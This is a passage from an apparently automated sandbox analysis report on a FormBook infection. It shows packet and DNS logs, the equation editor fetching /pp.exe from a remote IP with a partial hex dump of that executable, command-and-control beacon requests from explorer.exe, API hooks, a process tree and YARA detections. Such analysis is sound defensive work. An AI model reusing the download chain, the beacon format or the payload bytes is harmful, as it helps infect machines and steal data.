                                                                                                                                                      Nov 20, 2020 20:04:33.196382046 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196446896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196459055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196516037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196563005 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196588993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196604967 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196614981 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196625948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196711063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196712971 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196774960 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196780920 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196836948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196886063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196902037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196903944 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196985960 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.197880983 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.414916992 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414956093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414975882 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414995909 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415016890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415043116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415071964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415098906 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415124893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415152073 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415178061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415199995 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415225983 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415230989 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415251970 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415265083 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415277958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415303946 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415323973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415330887 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415344954 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415358067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415365934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415385962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415404081 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415421009 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415437937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415441990 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415456057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415457964 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415474892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415478945 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415496111 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415515900 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415534973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415549994 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415551901 CET8049165103.207.38.170192.168.2.22

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:06:00.028192997 CET5219753192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET53521978.8.8.8192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.610979080 CET5309953192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:20.801933050 CET53530998.8.8.8192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:54.392342091 CET5283853192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:54.432351112 CET53528388.8.8.8192.168.2.22

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 20, 2020 20:06:00.028192997 CET192.168.2.228.8.8.80x708cStandard query (0)www.auctionpros.clubA (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:20.610979080 CET192.168.2.228.8.8.80xa14dStandard query (0)www.sgbanfang.comA (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:54.392342091 CET192.168.2.228.8.8.80xccffStandard query (0)www.opalthemovie.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET8.8.8.8192.168.2.220x708cNo error (0)www.auctionpros.clubauctionpros.clubCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET8.8.8.8192.168.2.220x708cNo error (0)auctionpros.club162.0.232.118A (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:20.801933050 CET8.8.8.8192.168.2.220xa14dNo error (0)www.sgbanfang.com146.148.194.209A (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:54.432351112 CET8.8.8.8192.168.2.220xccffName error (3)www.opalthemovie.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 103.207.38.170
                                                                                                                                                      • www.auctionpros.club
                                                                                                                                                      • www.sgbanfang.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.2249165103.207.38.17080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:04:32.756769896 CET0OUTGET /pp.exe HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                      Host: 103.207.38.170
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 20, 2020 20:04:32.975847960 CET1INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:04:32 GMT
                                                                                                                                                      Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                      Last-Modified: Thu, 19 Nov 2020 08:07:19 GMT
                                                                                                                                                      ETag: "ada00-5b471378e0ce7"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 711168
                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 27 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ba 0a 00 00 1e 00 00 00 00 00 00 6e d9 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c d9 0a 00 4f 00 00 00 00 e0 0a 00 20 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 b9 0a 00 00 20 00 00 00 ba 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 1a 00 00 00 e0 0a 00 00 1c 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 d8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 d9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 50 e8 08 00 cc f0 01 00 03 00 00 00 02 00 00 06 c8 cd 01 00 88 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 1b 30 04 00 1f 00 00 00 01 00 00 11 00 00 28 1e 00 00 0a 28 05 00 00 06 00 de 02 00 dc 00 28 0b 00 00 06 02 28 06 00 00 06 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 16 28 1f 00 00 0a 20 b0 cb 8b 1b 20 39 39 48 0e 61 25 0a 1d 5e 45 07 00 00 00 d0 ff ff ff 41 00 00 00 12 00 00 00 74 00 00 00 02 00 00 00 5b 00 00 00 29 00 00 00 2b 72 00 06 20 6b 78 5c 52 5a 20 46 88 3c 91 61 2b c3 02 17 28 07 00 00 06 00 06 20 8d ca c1 ee 5a 20 4a a6 e5 72 61 2b ac 00 02 17 28 20 00 00 0a 00 06 20 79 ff 5a 07 5a 20 59 e0 ad 40 61 2b 94 02 16 28 21 00 00 0a 00 06 20 c0 ad 34 ae 5a 20 ab a0 33 85 61 38 7a ff ff ff 02 16 28 22 00 00 0a 06 20 e1 cb c2 91 5a 20 c8 13 e9 49 61 38 61 ff ff ff 2a 00 00 00 13 30 04 00 44 00 00 00 01 00 00 11 00 20 66 37 11 69 20 59 84 7e 07 61 25 0a 19 5e 45 03 00 00 00 21 00 00 00 02 00 00 00 e0 ff ff ff 2b 1f 02 28 0d 00 00 06 6f 16 00 00 06 28 23 00 00 0a 06 20 d3 ff 04 cb 5a 20 5d d5 9a 68 61 2b c4 00 2a 13 30 03 00 07 00 00 00 01 00 00 11 02 28 24 00 00 0a 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 6f 25 00 00 0a 2a 13 30 04 00 08 00 00 00 01 00 00 11 02 03 28 26 00 00 0a 2a 13 30 03 00 09 00 00 00 01 00 00 11 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL'_Pn @ @O H.textt `.rsrc @@.reloc@BPHP0*0((((*0( 99Ha%^EAt[)+r kx\RZ F<a+( Z Jra+( yZZ Y@a+(! 4Z 3a8z(" Z Ia8a*0D f7i Y~a%^E!+(o(# Z ]ha+*0($*0o%*0(&*0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.2249166162.0.232.11880C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:06:00.253843069 CET748OUTGET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1
                                                                                                                                                      Host: www.auctionpros.club
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 20, 2020 20:06:00.436134100 CET750INHTTP/1.1 404 Not Found
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:06:00 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                                                                                                                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .conta


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      2192.168.2.2249167146.148.194.20980C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:06:20.968894005 CET760OUTGET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1
                                                                                                                                                      Host: www.sgbanfang.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 20, 2020 20:06:21.133157969 CET760INHTTP/1.1 404 Not Found
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:06:21 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 146
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                      Code Manipulations

                                                                                                                                                      User Modules

                                                                                                                                                      Hook Summary

                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageAINLINEexplorer.exe

                                                                                                                                                      Processes

                                                                                                                                                      Process: explorer.exe, Module: USER32.dll
                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE7
                                                                                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE7
                                                                                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE7
                                                                                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE7

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: WINWORD.EXE PID: 1276 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:42
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x13f770000
                                                                                                                                                      File size:1424032 bytes
                                                                                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 1428 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:43
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: vbc.exe PID: 2492 Parent PID: 1428

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:46
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0xcb0000
                                                                                                                                                      File size:711168 bytes
                                                                                                                                                      MD5 hash:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 35%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      Analysis Process: RegSvcs.exe PID: 2560 Parent PID: 2492

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: RegSvcs.exe PID: 2520 Parent PID: 2492

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
